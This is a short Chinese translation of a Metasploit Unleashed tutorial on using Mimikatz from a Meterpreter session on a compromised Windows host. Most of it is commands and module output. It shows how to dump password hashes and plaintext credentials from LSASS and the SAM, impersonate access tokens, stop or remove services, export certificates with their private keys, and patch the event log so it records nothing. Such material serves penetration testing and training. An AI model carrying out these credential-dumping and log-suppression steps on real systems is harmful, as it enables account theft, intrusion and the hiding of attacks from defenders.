原文:http://www.offensive-security.com/metasploit-unleashed/Mimikatz
翻譯:http://drops.wooyun.org/tips/2443
確保在system權限下執行mimikatz
通過嘗試加載一個不存在的特性來得到可用模塊的完整列表
meterpreter > mimikatz_command -f fu:: Module : 'fu' introuvable Modules disponibles : - Standard crypto - Cryptographie et certificats hash - Hash system - Gestion système process - Manipulation des processus thread - Manipulation des threads service - Manipulation des services privilege - Manipulation des privilèges handle - Manipulation des handles impersonate - Manipulation tokens d'accès winmine - Manipulation du démineur minesweeper - Manipulation du démineur 7 nogpo - Anti-gpo et patchs divers samdump - Dump de SAM inject - Injecteur de librairies ts - Terminal Server divers - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module sekurlsa - Dump des sessions courantes par providers LSASS efs - Manipulations EFS
使用如下的語法來請求某個模塊可用的選項:
meterpreter > mimikatz_command -f divers:: Module : 'divers' identifié, mais commande '' introuvable Description du module : Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module noroutemon - [experimental] Patch Juniper Network Connect pour ne plus superviser la table de routage eventdrop - [super experimental] Patch l'observateur d'événements pour ne plus rien enregistrer cancelator - Patch le bouton annuler de Windows XP et 2003 en console pour déverrouiller une session secrets - Affiche les secrets utilisateur
導出hash和明文證書:
方式一:msv
方式二:kerberos
方式三:mimikatz_command -f samdump::hashes
Handle模塊可以用來list/kill進程以及模擬用戶令牌:
mimikatz_command -f handle::
Service模塊讓你可以list/start/stop以及remove windows服務:
mimikatz_command -f service::
Crypto模塊允許你list、export任何證書,以及儲存在目標機器上相應的私鑰:
mimikatz_command -f crypto::
掃雷:
mimikatz_command -f winmine::infos